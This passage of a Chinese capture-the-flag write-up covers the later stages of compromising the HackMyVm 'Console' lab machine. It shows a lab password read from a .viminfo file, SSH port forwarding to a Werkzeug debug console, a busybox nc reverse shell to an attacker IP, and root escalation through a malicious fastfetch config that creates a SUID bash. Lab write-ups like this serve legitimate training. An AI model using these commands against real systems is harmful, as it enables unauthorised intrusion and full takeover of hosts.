HackMyVm靶场之Console

2026-02-03 00:43:36 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 本文记录了HackMyVm靶场Console的渗透过程。通过端口扫描发现域名并绑定，分析JS代码找到命令执行漏洞获取初始Shell，注意反弹Shell仅限443端口。随后通过viminfo泄露密码登录welcome用户，利用端口转发访问Flask控制台获取qaq权限，最后利用fastfetch配置文件加载恶意命令进行SUID提权，最终拿到root权限。 综合评分： 85 文章分类： 渗透测试,CTF,WEB安全

)

我们在qaq用户里面什么也没有发现，我们在welcome用户里面发现了user.txt

然后接下来的思路就是我们需要去切换到welcome或者是qaq用户里面，www-data用户权限太低了什么都干不了

一般情况下，我们都是去搜索welcome和qaq用户相关的文件，或者是密码文件，但是这里都没有

find&nbsp;/ -name '*.txt*&nbsp;2>/dev/nullfind&nbsp;/ -user welcome&nbsp;2>/dev/nullfind&nbsp;/ -user qaq&nbsp;2>/dev/null

然后就没有了，不过仔细发现 .viminfo文件是root用户，我们猜测可能有什么信息，我们去查看

发现了welcome用户的密码，我们去登录

5)登录welcome

welcome:welcome123

登录成功，我们使用sudo -l,可以看到有一个日志文件 /opt/flask-app/logs/flask.log，我们需要使用qaq用户去查看的，我们去看看

&nbsp;sudo&nbsp;-u qaq&nbsp;cat&nbsp; /opt/flask-app/logs/flask.log

大概意思是，我们需要去端口转发5000端口到本地，我们去转发然后访问

Debugger&nbsp;PIN:&nbsp;471-575-410

这个应该是有用的，我们先保存下来

6)端口转发

我们直接使用ssh进行端口转发即可

ssh&nbsp;-L&nbsp;0.0.0.0:5000:127.0.0.1:5000&nbsp;[email protected]

我们去访问127.0.0.1:5000在kali里面

我们可以看到转发成功

我们去扫描一下，可以扫描到一个console目录，我们去访问看看

http://127.0.0.1:5000/console

出现一个输入框可以看到是PlN，我们输入前面的数字:

471-575-410

提示我们使用python进行命令执行，那么我们进行反弹试试看，这里我们还是使用443端口

import&nbsp;os;os.system("busybox nc 192.168.137.102 443 -e /bin/bash")

我们可以看到反弹成功，而且用户是qaq用户，我们去看看

7)qaq用户

我们可以无密码执行/usr/bin/fastfetch，我们去看看怎么使用

我们让ai给我们去分析

8)提权

我们利用 –config 加载恶意配置 (代码执行)进行提权

这里我们只能使用json格式的文件

第一步: 创建 JSON 恶意配置

在 /tmp 下重新写入 exploit.jsonc：

cat&nbsp;<< EOF > /tmp/exploit.jsonc{&nbsp; &nbsp;&nbsp;"\$schema":&nbsp;"https://github.com/fastfetch-cli/fastfetch/raw/dev/doc/json_schema.json",&nbsp; &nbsp;&nbsp;"modules": [&nbsp; &nbsp; &nbsp; &nbsp; {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"type":&nbsp;"command",&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"key":&nbsp;"Exploit",&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"shell":&nbsp;"/bin/bash",&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"text":&nbsp;"cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash"&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; ]}EOF

#

第二步：再次尝试 sudo 执行

使用新格式的配置文件运行：

sudo&nbsp;/usr/bin/fastfetch -c /tmp/exploit.jsonc

#

第三步:验证并进入 Root

如果执行没有报错（或者显示了 “Exploit” 模块），立即执行：

ls&nbsp;-l /tmp/rootbash/tmp/rootbash -p

我们可以看到是root用户，我们获取r00t.txt即可

至此，这个靶机渗透成功。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：MS02423 MS02423 MS02423《HackMyVm靶场之Console》